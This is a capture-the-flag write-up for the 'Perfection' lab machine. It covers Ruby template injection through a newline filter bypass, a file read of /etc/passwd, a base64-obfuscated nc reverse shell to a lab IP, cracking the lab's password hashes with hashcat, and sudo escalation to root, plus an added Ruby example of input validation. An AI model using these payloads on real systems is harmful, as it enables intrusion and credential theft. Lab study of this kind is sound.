Completed in Release Arena
Perfection
Difficulty: Easy
OS: Linux
Date: 2024-03-02
Completed: 2024-03-02
Enumeration
The target is listening on only ports 22 and 80.
There are no hidden files or VHOSTs, etc., just a page on which data can be entered to calculate weighted grades.
Wappalyzer, or analysis of the Server header, reveals that it is running on Ruby.
Foothold
There is a filter validating input to the form, not allowing characters such as '%"< etc. However, this article describes a method for bypassing SSTI validation in Ruby using a newline character (%0A).
This method allows for SSTI on the site as follows, using payloads from HackTricks:
category1=abc%0A<%25%3d+7*7+%25>
This will be interpreted server-side as:
abc
<%= 7*7 %>
This page renders the result as 49, confirming SSTI.
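The newline bypass described above works against validators whose regular expression is anchored with ^ and $, which in Ruby match at line boundaries rather than at the start and end of the whole string. The writeup does not show the site's actual filter, so the filter below is an assumed one written for this added example (not code from the box or the writeup): it decodes the form value the way a Rack application would, then checks it against a line-anchored pattern and against the string-anchored (\A ... \z) fix.

```ruby
# Added example: line-anchored vs string-anchored input validation in Ruby.
# The character class and both patterns are assumptions, not the target's filter.
require 'cgi'

# Assumed allow-list: letters, digits, spaces and a little punctuation.
# In Ruby, ^ and $ match at LINE boundaries, so a value whose first line is
# clean passes even if a later line contains template syntax.
LINE_ANCHORED = /^[A-Za-z0-9 .,-]+$/

# Hardened version: \A and \z anchor to the start and end of the STRING,
# so a newline inside the value cannot split it into a "clean" first line.
STRING_ANCHORED = /\A[A-Za-z0-9 .,-]+\z/

# URL-decode a form value (so %0A becomes "\n" and %25 becomes "%"),
# which is what the application sees before validation.
def decode_form_value(raw)
  CGI.unescape(raw)
end

def valid_line_anchored?(value)
  !(value =~ LINE_ANCHORED).nil?
end

def valid_string_anchored?(value)
  !(value =~ STRING_ANCHORED).nil?
end

# Evaluate one raw form value under both validators and report the outcome.
def classify(raw)
  value = decode_form_value(raw)
  {
    decoded: value,
    passes_line_anchored: valid_line_anchored?(value),
    passes_string_anchored: valid_string_anchored?(value)
  }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: a benign category name and the newline-prefixed
  # template probe from the writeup (7*7, with no side effects).
  ['abc', 'abc%0A<%25%3d+7*7+%25>'].each do |raw|
    r = classify(raw)
    puts "#{raw.inspect} -> decoded #{r[:decoded].inspect}: " \
         "^...$ passes=#{r[:passes_line_anchored]}, " \
         "\\A...\\z passes=#{r[:passes_string_anchored]}"
  end
end
```

The anchor fix closes this specific bypass, but the underlying defect is that validated user input is still being spliced into an ERB template and evaluated; the robust remediation is to pass user data to the template as a variable rather than as template source.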
Using this SSTI, we can verify that the only user on the target is susan:
<%= File.open('/etc/passwd').read %>
User
A reverse shell as the susan user can be spawned through the SSTI described above, as the web server is running as this user. The following SSTI payload was used:
<%= system('/bin/bash -c "echo -n cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xNiAxMzM3ID4vdG1wL2Y= | base64 -d | /bin/bash"') %>
The base64-encoded reverse shell within is the nc 'mkfifo' shell.
From this shell, the user flag can be read.
Privilege Escalation
Add an SSH key to susan in the reverse shell, and connect via SSH. The login message states that the user has mail, which can be viewed in /var/mail/susan:
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students
in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:
{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}
Note that all letters of the first name should be converted into lowercase.
Please hit me with updates on the migration when you can. I am currently registering our university with the platform.
- Tina, your delightful student
In the susan home directory, there is the root-owned ~/Migration/pupilpath_credentials.db. Copying the DB with scp and opening it with SQLite provides the following hashes:
Susan Miller
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
Tina Smith
dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
Harry Tyler
d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
David Lawrence
ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
Stephen Locke
154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8
TIP
The contents of this DB can also be dumped on the target, without copying the file locally, using the command
sqlite3 /path/to/db.db .dump.
All the hashes were extracted into a file for cracking. A wordlist was also created, with the following contents, following the password format described in Susan’s mail:
susan_nasus_
tina_anit_
harry_yrrah_
david_divad_
stephen_nehpets_
The following hashcat command was used to increment digits in a hybrid attack, taking the wordlist above and appending 0 to 999999999. The --increment flag allows for a variable total password length using the mask:
.\hashcat.exe -m 1400 -a 6 .\raw_hashes\htb-perfection.txt .\wordlists\htb-perfection.txt '?d?d?d?d?d?d?d?d?d' --increment
This cracks the following password for susan:
susan_nasus_413759210
Running sudo -l reveals susan has full sudo access. Thus, sudo su spawns a root shell, from which the root flag can be read.